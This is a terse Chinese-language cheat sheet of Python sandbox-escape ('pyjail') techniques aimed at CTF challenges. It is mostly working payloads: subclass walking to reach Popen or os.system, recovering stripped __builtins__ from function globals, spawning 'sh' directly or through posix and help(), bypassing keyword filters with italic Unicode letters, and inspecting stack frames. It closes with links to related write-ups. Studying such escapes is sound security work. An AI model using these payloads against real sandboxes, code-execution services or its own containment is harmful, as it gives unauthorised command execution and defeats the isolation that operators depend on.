Python沙箱逃逸

一些Python#

沙箱逃逸#

1. inspect
2. frame
3. dis.dis
4. sys
5. object

popen = object.__subclasses__()[351]
def run_cmd(cmd):
    print(popen(cmd,shell=True,stdout=-1).communicate()[0].decode())

__builtins__ = popen.__init__.__globals__.get('__builtins__')
open = __builtins__.get('open')
__import__ = __builtins__.get('__import__')

sys = __import__('sys')
app_main = sys.modules['__main__']

compile = __builtins__.get('compile')
StringIO = __import__('io').StringIO
dis = __import__('dis')
inspect = __import__('inspect')
threading = __import__('threading')

def print_f_code(f_code):
    i = StringIO()
    dis.dis(f_code, file=i)
    print(i.getvalue())

def get_top_frame(frame):
    while frame.f_back:
        print(frame)
        frame = frame.f_back
    return frame.f_code

main_thread = threading.enumerate()[0]
frame = sys._current_frames().get(main_thread.ident, None)
print(print_f_code(get_top_frame(frame)))

__builtins__ 丢失#

[c for c in ().__class__.__base__.__subclasses__() if 'function' in c.__init__.__str__()][0].__init__.__builtins__['print']("Hi")

如果是nc连接，可以直接拿shell#

__import__('os').system('sh')

ASCII 斜体绕过#

https://lingojam.com/ItalicTextGenerator

globals -> 𝘨𝘭𝘰𝘣𝘢𝘭𝘴 （就不能识别出 globals 了）

完全限制（no builtins）#

[ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if x.__name__=="_wrap_close"][0]["system"]("ls")

posix#

import sys
sys.modules['posix'].system('sh')

help#

help 函数可以打开帮助文档. 索引到 os 模块之后可以输入 !sh 回车打开 sh

获取栈帧#

• CISCN2024-WEB-wp - Eddie_Murphy - 博客园 (cnblogs.com)
• python栈帧沙箱逃逸 - Zer0peach can't think —— 精辟
• Escaping Python Sandboxes – OSIRIS Lab at NYU Tandon
• Bypass Python sandboxes | HackTricks | HackTricks
• CTF Pyjail 沙箱逃逸绕过合集 - 先知社区 (aliyun.com) —— 很多
• salvatore-abello/python-ctf-cheatsheet (github.com) —— 精华

混淆#

用IPython，实时反混淆、正则替换

pip install ipython
ipython